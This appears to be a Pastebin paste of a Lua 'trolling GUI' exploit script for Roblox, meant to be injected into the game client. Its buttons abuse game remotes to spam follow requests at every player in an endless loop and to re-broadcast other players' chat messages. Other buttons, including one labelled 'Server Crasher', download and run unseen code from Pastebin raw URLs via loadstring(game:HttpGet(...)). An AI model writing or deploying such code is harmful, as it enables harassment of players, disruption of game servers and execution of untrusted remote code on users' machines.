Advertisement
Guest User

Untitled

a guest
Jan 18th, 2020
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.65 KB | None | 0 0
  1. --[[
  2. ██████╗██████╗ █████╗ ███████╗██╗ ██╗ ██╗ ██╗ █████╗ █████╗ ██╗██╗ ██╗
  3. ██╔════╝██╔══██╗██╔══██╗╚══███╔╝╚██╗ ██╔╝████████╗██╔══██╗██╔══██╗███║██║ ██║
  4. ██║ ██████╔╝███████║ ███╔╝ ╚████╔╝ ╚██╔═██╔╝╚█████╔╝╚█████╔╝╚██║███████║
  5. ██║ ██╔══██╗██╔══██║ ███╔╝ ╚██╔╝ ████████╗██╔══██╗██╔══██╗ ██║╚════██║
  6. ╚██████╗██║ ██║██║ ██║███████╗ ██║ ╚██╔═██╔╝╚█████╔╝╚█████╔╝ ██║ ██║
  7. ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚════╝ ╚════╝ ╚═╝ ╚═╝made by CrAZy#8814
  8.  
  9. ]]--
  10.  
  11. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Made by CrAZy#8814.\n My first Trolling Gui. Made for testing my scripting skills.",Duration=20,Button1="Alright."})
  12.  
  13. -- Instances:
  14.  
  15. local ScreenGui = Instance.new("ScreenGui")
  16. local Frame = Instance.new("Frame")
  17. local NameOfScript = Instance.new("TextLabel")
  18. local ImageLabel = Instance.new("ImageLabel")
  19. local Version = Instance.new("TextLabel")
  20. local FollowAll = Instance.new("TextButton")
  21. local R6Pipis = Instance.new("TextButton")
  22. local Note = Instance.new("TextLabel")
  23. local FlyingOrbs = Instance.new("TextButton")
  24. local ChatTroll = Instance.new("TextButton")
  25. local ServerCrasher = Instance.new("TextButton")
  26. local ChatByp = Instance.new("TextButton")
  27. local AnotherTrollGui = Instance.new("TextButton")
  28. local Shattervast = Instance.new("TextButton")
  29. local InfiniteYield = Instance.new("TextButton")
  30. local Close = Instance.new("TextButton")
  31. local FE_EnabledDisabled = Instance.new("TextLabel")
  32.  
  33. --Properties:
  34.  
  35. ScreenGui.Parent = game.CoreGui
  36. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  37.  
  38. Frame.Active = true
  39. Frame.Draggable = true
  40. Frame.Parent = ScreenGui
  41. Frame.BackgroundColor3 = Color3.new(0.509804, 0.509804, 0.509804)
  42. Frame.BorderColor3 = Color3.new(0, 0, 0)
  43. Frame.BorderSizePixel = 3
  44. Frame.Position = UDim2.new(0.274410784, 0, 0.206552744, 0)
  45. Frame.Size = UDim2.new(0, 479, 0, 411)
  46.  
  47. NameOfScript.Name = "NameOfScript"
  48. NameOfScript.Parent = Frame
  49. NameOfScript.BackgroundColor3 = Color3.new(1, 1, 1)
  50. NameOfScript.BackgroundTransparency = 1
  51. NameOfScript.Position = UDim2.new(0.0195221007, 0, 0.0272019468, 0)
  52. NameOfScript.Size = UDim2.new(0, 200, 0, 50)
  53. NameOfScript.Font = Enum.Font.Arcade
  54. NameOfScript.Text = "some dumb trolling gui"
  55. NameOfScript.TextColor3 = Color3.new(0, 0, 0)
  56. NameOfScript.TextScaled = true
  57. NameOfScript.TextSize = 14
  58. NameOfScript.TextWrapped = true
  59.  
  60. ImageLabel.Parent = Frame
  61. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  62. ImageLabel.BackgroundTransparency = 1
  63. ImageLabel.Position = UDim2.new(0.774579465, 0, 0.729927003, 0)
  64. ImageLabel.Size = UDim2.new(0, 107, 0, 110)
  65. ImageLabel.Image = "http://www.roblox.com/asset/?id=4492172626"
  66.  
  67. Version.Name = "Version"
  68. Version.Parent = Frame
  69. Version.BackgroundColor3 = Color3.new(1, 1, 1)
  70. Version.BackgroundTransparency = 1
  71. Version.Position = UDim2.new(0.154555887, 0, 0.148400247, 0)
  72. Version.Size = UDim2.new(0, 136, 0, 16)
  73. Version.Font = Enum.Font.Code
  74. Version.Text = "v0.7 / BlastingStone#8878"
  75. Version.TextColor3 = Color3.new(0, 0, 0)
  76. Version.TextSize = 14
  77.  
  78. FollowAll.Name = "FollowAll"
  79. FollowAll.Parent = Frame
  80. FollowAll.BackgroundColor3 = Color3.new(1, 1, 1)
  81. FollowAll.BorderSizePixel = 3
  82. FollowAll.Position = UDim2.new(0.0279605929, 0, 0.252499998, 0)
  83. FollowAll.Size = UDim2.new(0, 125, 0, 35)
  84. FollowAll.Font = Enum.Font.Cartoon
  85. FollowAll.Text = "Follow All"
  86. FollowAll.TextColor3 = Color3.new(0, 0, 0)
  87. FollowAll.TextSize = 14
  88.  
  89. R6Pipis.Name = "R6Pipis"
  90. R6Pipis.Parent = Frame
  91. R6Pipis.BackgroundColor3 = Color3.new(1, 1, 1)
  92. R6Pipis.BorderSizePixel = 3
  93. R6Pipis.Position = UDim2.new(0.0279605929, 0, 0.425833315, 0)
  94. R6Pipis.Size = UDim2.new(0, 125, 0, 35)
  95. R6Pipis.Font = Enum.Font.Cartoon
  96. R6Pipis.Text = "R6 Pipis"
  97. R6Pipis.TextColor3 = Color3.new(0, 0, 0)
  98. R6Pipis.TextSize = 14
  99.  
  100. Note.Name = "Note"
  101. Note.Parent = Frame
  102. Note.BackgroundColor3 = Color3.new(1, 1, 1)
  103. Note.BackgroundTransparency = 1
  104. Note.Position = UDim2.new(0.290444702, 0, 0.876368582, 0)
  105. Note.Size = UDim2.new(0, 200, 0, 50)
  106. Note.Font = Enum.Font.Code
  107. Note.Text = "I'm sorry for this script."
  108. Note.TextColor3 = Color3.new(0, 0, 0)
  109. Note.TextSize = 14
  110.  
  111. FlyingOrbs.Name = "FlyingOrbs"
  112. FlyingOrbs.Parent = Frame
  113. FlyingOrbs.BackgroundColor3 = Color3.new(1, 1, 1)
  114. FlyingOrbs.BorderSizePixel = 3
  115. FlyingOrbs.Position = UDim2.new(0.0279605929, 0, 0.602916658, 0)
  116. FlyingOrbs.Size = UDim2.new(0, 125, 0, 35)
  117. FlyingOrbs.Font = Enum.Font.Cartoon
  118. FlyingOrbs.Text = "R6 Flying Orbs"
  119. FlyingOrbs.TextColor3 = Color3.new(0, 0, 0)
  120. FlyingOrbs.TextSize = 14
  121.  
  122. ChatTroll.Name = "ChatTroll"
  123. ChatTroll.Parent = Frame
  124. ChatTroll.BackgroundColor3 = Color3.new(1, 1, 1)
  125. ChatTroll.BorderSizePixel = 3
  126. ChatTroll.Position = UDim2.new(0.368475348, 0, 0.252499998, 0)
  127. ChatTroll.Size = UDim2.new(0, 125, 0, 35)
  128. ChatTroll.Font = Enum.Font.Cartoon
  129. ChatTroll.Text = "Chat Troll"
  130. ChatTroll.TextColor3 = Color3.new(0, 0, 0)
  131. ChatTroll.TextSize = 14
  132.  
  133. ServerCrasher.Name = "ServerCrasher"
  134. ServerCrasher.Parent = Frame
  135. ServerCrasher.BackgroundColor3 = Color3.new(1, 1, 1)
  136. ServerCrasher.BorderSizePixel = 3
  137. ServerCrasher.Position = UDim2.new(0.369704425, 0, 0.425833315, 0)
  138. ServerCrasher.Size = UDim2.new(0, 125, 0, 35)
  139. ServerCrasher.Font = Enum.Font.Cartoon
  140. ServerCrasher.Text = "Server Crasher"
  141. ServerCrasher.TextColor3 = Color3.new(0, 0, 0)
  142. ServerCrasher.TextSize = 14
  143.  
  144. ChatByp.Name = "ChatByp"
  145. ChatByp.Parent = Frame
  146. ChatByp.BackgroundColor3 = Color3.new(1, 1, 1)
  147. ChatByp.BorderSizePixel = 3
  148. ChatByp.Position = UDim2.new(0.369704425, 0, 0.602916658, 0)
  149. ChatByp.Size = UDim2.new(0, 125, 0, 35)
  150. ChatByp.Font = Enum.Font.Cartoon
  151. ChatByp.Text = "Chat Bypass"
  152. ChatByp.TextColor3 = Color3.new(0, 0, 0)
  153. ChatByp.TextSize = 14
  154.  
  155. AnotherTrollGui.Name = "AnotherTrollGui"
  156. AnotherTrollGui.Parent = Frame
  157. AnotherTrollGui.BackgroundColor3 = Color3.new(1, 1, 1)
  158. AnotherTrollGui.BorderSizePixel = 3
  159. AnotherTrollGui.Position = UDim2.new(0.706457436, 0, 0.600483596, 0)
  160. AnotherTrollGui.Size = UDim2.new(0, 125, 0, 35)
  161. AnotherTrollGui.Font = Enum.Font.Cartoon
  162. AnotherTrollGui.Text = "Another troll gui"
  163. AnotherTrollGui.TextColor3 = Color3.new(0, 0, 0)
  164. AnotherTrollGui.TextSize = 14
  165.  
  166. Shattervast.Name = "Shattervast"
  167. Shattervast.Parent = Frame
  168. Shattervast.BackgroundColor3 = Color3.new(1, 1, 1)
  169. Shattervast.BorderSizePixel = 3
  170. Shattervast.Position = UDim2.new(0.706457436, 0, 0.250066906, 0)
  171. Shattervast.Size = UDim2.new(0, 125, 0, 35)
  172. Shattervast.Font = Enum.Font.Cartoon
  173. Shattervast.Text = "Shattervast"
  174. Shattervast.TextColor3 = Color3.new(0, 0, 0)
  175. Shattervast.TextSize = 14
  176.  
  177. InfiniteYield.Name = "InfiniteYield"
  178. InfiniteYield.Parent = Frame
  179. InfiniteYield.BackgroundColor3 = Color3.new(1, 1, 1)
  180. InfiniteYield.BorderSizePixel = 3
  181. InfiniteYield.Position = UDim2.new(0.706457436, 0, 0.423400223, 0)
  182. InfiniteYield.Size = UDim2.new(0, 125, 0, 35)
  183. InfiniteYield.Font = Enum.Font.Cartoon
  184. InfiniteYield.Text = "Infinite Yield"
  185. InfiniteYield.TextColor3 = Color3.new(0, 0, 0)
  186. InfiniteYield.TextSize = 14
  187.  
  188. Close.Name = "Close"
  189. Close.Parent = Frame
  190. Close.BackgroundColor3 = Color3.new(1, 1, 1)
  191. Close.BorderSizePixel = 3
  192. Close.Position = UDim2.new(0.895615876, 0, 0, 0)
  193. Close.Size = UDim2.new(0, 50, 0, 50)
  194. Close.Font = Enum.Font.Code
  195. Close.Text = "X"
  196. Close.TextColor3 = Color3.new(0, 0, 0)
  197. Close.TextScaled = true
  198. Close.TextSize = 14
  199. Close.TextWrapped = true
  200.  
  201. FE_EnabledDisabled.Name = "FE_EnabledDisabled"
  202. FE_EnabledDisabled.Parent = Frame
  203. FE_EnabledDisabled.BackgroundColor3 = Color3.new(1, 1, 1)
  204. FE_EnabledDisabled.BackgroundTransparency = 1
  205. FE_EnabledDisabled.Position = UDim2.new(0.344535023, 0, 0.875894189, 0)
  206. FE_EnabledDisabled.Size = UDim2.new(0, 136, 0, 16)
  207. FE_EnabledDisabled.Font = Enum.Font.Code
  208. FE_EnabledDisabled.Text = "FE is unknown."
  209. FE_EnabledDisabled.TextColor3 = Color3.new(0, 0, 0)
  210. FE_EnabledDisabled.TextSize = 14
  211.  
  212. -- Scripts:
  213.  
  214. local function WMLOWQ_fake_script() -- NameOfScript.LocalScript
  215. local script = Instance.new('LocalScript', NameOfScript)
  216.  
  217. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  218.  
  219. counter = 0
  220.  
  221. while wait(0.1)do
  222. script.Parent.TextColor3 = Color3.fromHSV(zigzag(counter),1,1)
  223.  
  224. counter = counter + 0.01
  225. end
  226. end
  227. coroutine.wrap(WMLOWQ_fake_script)()
  228. local function QEWER_fake_script() -- FollowAll.LocalScript
  229. local script = Instance.new('LocalScript', FollowAll)
  230.  
  231. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  232.  
  233. counter = 0
  234.  
  235. while wait(0.1)do
  236. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  237.  
  238. counter = counter + 0.01
  239. end
  240. end
  241. coroutine.wrap(QEWER_fake_script)()
  242. FollowAll.MouseButton1Click:connect(function() -- FollowAll.LocalScript
  243. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  244. local RobloxReplicatedStorage = game:GetService('RobloxReplicatedStorage')
  245. local RemoteEvent_NewFollower = RobloxReplicatedStorage:WaitForChild('NewFollower')
  246. while wait(0) do
  247. for i,v in pairs(game.Players:GetChildren()) do
  248. RemoteEvent_NewFollower:FireServer(v, true)
  249. end
  250. end
  251. end)
  252. local function TYRGWP_fake_script() -- R6Pipis.LocalScript
  253. local script = Instance.new('LocalScript', R6Pipis)
  254.  
  255. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  256.  
  257. counter = 0
  258.  
  259. while wait(0.1)do
  260. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  261.  
  262. counter = counter + 0.01
  263. end
  264. end
  265. coroutine.wrap(TYRGWP_fake_script)()
  266. R6Pipis.MouseButton1Click:connect(function() -- R6Pipis.LocalScript
  267. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  268. loadstring(game:HttpGet(('https://pastebin.com/raw/VBNjM0nh'),true))()
  269. end)
  270. local function OQNZBW_fake_script() -- Note.LocalScript
  271. local script = Instance.new('LocalScript', Note)
  272.  
  273. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  274.  
  275. counter = 0
  276.  
  277. while wait(0.1)do
  278. script.Parent.TextColor3 = Color3.fromHSV(zigzag(counter),1,1)
  279.  
  280. counter = counter + 0.01
  281. end
  282. end
  283. coroutine.wrap(OQNZBW_fake_script)()
  284. local function JSVD_fake_script() -- Frame.LocalScript
  285. local script = Instance.new('LocalScript', Frame)
  286.  
  287. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  288.  
  289. counter = 0
  290.  
  291. while wait(0.1)do
  292. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  293.  
  294. counter = counter + 0.01
  295. end
  296. end
  297. coroutine.wrap(JSVD_fake_script)()
  298. local function IKYJRKY_fake_script() -- FlyingOrbs.LocalScript
  299. local script = Instance.new('LocalScript', FlyingOrbs)
  300.  
  301. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  302.  
  303. counter = 0
  304.  
  305. while wait(0.1)do
  306. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  307.  
  308. counter = counter + 0.01
  309. end
  310. end
  311. coroutine.wrap(IKYJRKY_fake_script)()
  312. FlyingOrbs.MouseButton1Click:connect(function() -- FlyingOrbs.LocalScript
  313. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  314. loadstring(game:HttpGet(('https://pastebin.com/raw/UrxVQURH'),true))()
  315. end)
  316. local function BEYKNZX_fake_script() -- ChatTroll.LocalScript
  317. local script = Instance.new('LocalScript', ChatTroll)
  318.  
  319. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  320.  
  321. counter = 0
  322.  
  323. while wait(0.1)do
  324. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  325.  
  326. counter = counter + 0.01
  327. end
  328. end
  329. coroutine.wrap(BEYKNZX_fake_script)()
  330. ChatTroll.MouseButton1Click:connect(function() -- ChatTroll.LocalScript
  331. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  332. local Action = game.Players:GetPlayers()
  333. for i = 1,#Action do
  334. Action[i].Chatted:connect(function(Message)
  335. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("".."["..Action[i].Name.."]".." "..Message, "All")
  336. end)
  337. end
  338. end)
  339. local function XPLFXCK_fake_script() -- ServerCrasher.LocalScript
  340. local script = Instance.new('LocalScript', ServerCrasher)
  341.  
  342. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  343.  
  344. counter = 0
  345.  
  346. while wait(0.1)do
  347. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  348.  
  349. counter = counter + 0.01
  350. end
  351. end
  352. coroutine.wrap(XPLFXCK_fake_script)()
  353. ServerCrasher.MouseButton1Click:connect(function() -- ServerCrasher.LocalScript
  354. loadstring(game:HttpGet(('https://pastebin.com/raw/VSeqmt5t'),true))()
  355. end)
  356. local function RVXZO_fake_script() -- ChatByp.LocalScript
  357. local script = Instance.new('LocalScript', ChatByp)
  358.  
  359. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  360.  
  361. counter = 0
  362.  
  363. while wait(0.1)do
  364. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  365.  
  366. counter = counter + 0.01
  367. end
  368. end
  369. coroutine.wrap(RVXZO_fake_script)()
  370. ChatByp.MouseButton1Click:connect(function() -- ChatByp.LocalScript
  371. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  372. loadstring(game:HttpGet(('https://pastebin.com/raw/Wh0DUEdn'),true))()
  373. end)
  374. local function GQDG_fake_script() -- AnotherTrollGui.LocalScript
  375. local script = Instance.new('LocalScript', AnotherTrollGui)
  376.  
  377. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  378.  
  379. counter = 0
  380.  
  381. while wait(0.1)do
  382. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  383.  
  384. counter = counter + 0.01
  385. end
  386. end
  387. coroutine.wrap(GQDG_fake_script)()
  388. AnotherTrollGui.MouseButton1Click:connect(function() -- AnotherTrollGui.LocalScript
  389. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  390. loadstring(game:HttpGet(('https://pastebin.com/raw/QBYzwGtQ'),true))()
  391. end)
  392. local function AXUDA_fake_script() -- Shattervast.LocalScript
  393. local script = Instance.new('LocalScript', Shattervast)
  394.  
  395. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  396.  
  397. counter = 0
  398.  
  399. while wait(0.1)do
  400. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  401.  
  402. counter = counter + 0.01
  403. end
  404. end
  405. coroutine.wrap(AXUDA_fake_script)()
  406. Shattervast.MouseButton1Click:connect(function() -- Shattervast.LocalScript
  407. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  408. loadstring(game:HttpGet(('https://pastebin.com/raw/TE7fz2m9'),true))()
  409. end)
  410. local function DFJD_fake_script() -- InfiniteYield.LocalScript
  411. local script = Instance.new('LocalScript', InfiniteYield)
  412.  
  413. function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  414.  
  415. counter = 0
  416.  
  417. while wait(0.1)do
  418. script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  419.  
  420. counter = counter + 0.01
  421. end
  422. end
  423. coroutine.wrap(DFJD_fake_script)()
  424. InfiniteYield.MouseButton1Click:connect(function() -- InfiniteYield.LocalScript
  425. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  426. loadstring(game:HttpGet(('https://pastebin.com/raw/MjBzRjmT'),true))()
  427. end)
  428. Close.MouseButton1Click:connect(function() -- Close.LocalScript
  429. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})
  430. script.Parent.Parent:Destroy()
  431. end)
  432. local function EVHVG_fake_script() -- FE_EnabledDisabled.LocalScript
  433. local script = Instance.new('LocalScript', FE_EnabledDisabled)
  434.  
  435. if game.Workspace.FilteringEnabled == false then
  436. FE_EnabledDisabled.Text = "FE is disabled."
  437. FE_EnabledDisabled.TextColor3 = Color3.fromRGB(200,10,10)
  438. else
  439. FE_EnabledDisabled.Text = "FE is enabled."
  440. FE_EnabledDisabled.TextColor3 = Color3.fromRGB(10,200,10)
  441. end
  442. end
  443. coroutine.wrap(EVHVG_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement